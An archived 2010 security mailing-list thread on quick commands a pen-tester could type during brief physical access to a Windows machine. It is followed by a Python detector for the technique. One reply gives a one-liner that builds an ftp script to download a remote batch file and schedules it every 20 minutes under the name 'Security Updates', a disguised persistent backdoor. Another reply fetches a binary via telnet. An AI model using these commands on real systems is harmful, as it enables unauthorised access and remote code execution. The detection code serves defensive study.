PaulDotCom mailing list archives

Quick keyboard pwnage


From: NSweaney at tulsacash.com (Nathan Sweaney)
Date: Tue, 16 Mar 2010 08:59:41 -0500

Don't forget that telnet isn't installed by default on Vista & 7.  

What about something like this:

echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >> %WINDIR%\ftp.scr & echo bill at gates.com >> %WINDIR%\ftp.scr & echo get script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp -s:ftp.scr > %WINDIR%\security.bat & echo start %WINDIR%\script.bat >> %WINDIR%\security.bat & schtasks /create /tn "Security Updates" /sc minute /mo 20 /tr security.bat

I haven't tested it so I may have some syntax wrong, but the basic idea should work.  Now your box just checks in every 
20 minutes & does whatever you put in script.bat.

If you wanted to get fancy, you could change script.bat to something like 123.123.123.123.bat (or whatever its 
external IP is).  Then just check your server logs to see who is connecting & you can customize your scripts to each 
location.  That may take a little more fancy kung fu to get your external IP though.  

nathan


-----Original Message-----
From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of Josh Olson
Sent: Monday, March 15, 2010 11:46 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] Quick keyboard pwnage

Adrian,

I haven't been able to make this work, but perhaps with some tweaking,
telnet and edlin can do it?

Something like:

telnet -f binary.exe
o site.com port
GET /path/to/binary.exe
quit

Then edlin binary.exe /B
1,3d
e

Note that edlin doesn't ship with 64-bit versions of Windows.

Josh

On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
Hi All,
I need some ideas. Let's say you are the Flash (or Quicksilver if you
prefer Marvel comics), and could type uberfast. You have no storage device
with you, but like I said, you can type really fast. If you had momentary
access to a physical box (Windows or Linux, but I'm most interested in
Windows), what command would you run as a pen-tester?

Ideas to get us started:
1. Net user add obviously would be an option for some. (this I know the
command for)
2. Anyone know a way to enter a binary at the command line and quickly run
it?
3. Wget functionality in Windows would be nice, then you could just grab exes
you want quickly.
4. Quickly upload files off of the target system to someplace you control on
the internet.

Extra points for simple commands, quick to type, and on one line. If I use
your idea, I'll be sure to thank you in the project notes/comments.

Thanks,
Adrian


_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
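
For defenders, the check-in pattern described in this thread (an ftp command file built with echo, ftp -s:, and a schtasks job on a minute schedule) leaves distinctive process-creation command lines. The sketch below is an added example, not part of the thread or written by its authors; the sample events, the 60-minute threshold and the script-extension list are assumptions.

```python
import re

# Constructed process-creation command lines (as logged by Windows event 4688
# or Sysmon event 1). None come from a real host; the FTP host is a placeholder.
SAMPLE_EVENTS = [
    r'cmd.exe /c echo open ftp.example.test > C:\Windows\ftp.scr',
    r'ftp -s:ftp.scr',
    r'schtasks /create /tn "Security Updates" /sc minute /mo 20 /tr security.bat',
    r'schtasks /create /tn "Defrag" /sc weekly /d SUN /tr C:\Windows\System32\defrag.exe',
    r'schtasks /query /fo LIST',
    r'ftp ftp.example.test',
]
SCRIPT_EXT = re.compile(r'\.(bat|cmd|vbs|js|ps1)\b', re.I)  # assumption: extensions to flag
MAX_MINUTES = 60  # assumption: minute schedules at or below this are unusual

def switch(cmdline, name):
    """Return the value following a /switch (quoted or bare), or None."""
    m = re.search(r'(?i)(?:^|\s)/%s\s+("([^"]*)"|\S+)' % re.escape(name), cmdline)
    if not m:
        return None
    return m.group(2) if m.group(2) is not None else m.group(1)

def findings(cmdline):
    """Return the reasons a command line matches the pattern from the thread."""
    out = []
    if re.search(r'(?i)\bschtasks(\.exe)?\b.*\s/create\b', cmdline):
        sc = (switch(cmdline, 'sc') or '').lower()
        mo = switch(cmdline, 'mo') or '1'   # schtasks defaults /mo to 1
        tr = switch(cmdline, 'tr') or ''
        if sc == 'minute' and mo.isdigit() and int(mo) <= MAX_MINUTES:
            out.append('task repeats every %s min' % mo)
        if SCRIPT_EXT.search(tr):
            out.append('task runs a script: %s' % tr)
    if re.search(r'(?i)\bftp(\.exe)?\s.*-s:\S+', cmdline):
        out.append('ftp driven by a command file (-s:)')
    if re.search(r'(?i)\becho\s+open\s+\S+\s*>', cmdline):
        out.append('ftp command file written with echo')
    return out

def triage(events):
    """Map each flagged command line to its list of reasons."""
    return {e: f for e in events if (f := findings(e))}

if __name__ == '__main__':
    for cmd, why in triage(SAMPLE_EVENTS).items():
        print(cmd, '->', '; '.join(why))
```

The weekly defrag task, the schtasks query and the interactive ftp session in the sample pass unflagged, so the rules key on the combination the thread describes rather than on schtasks or ftp alone.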
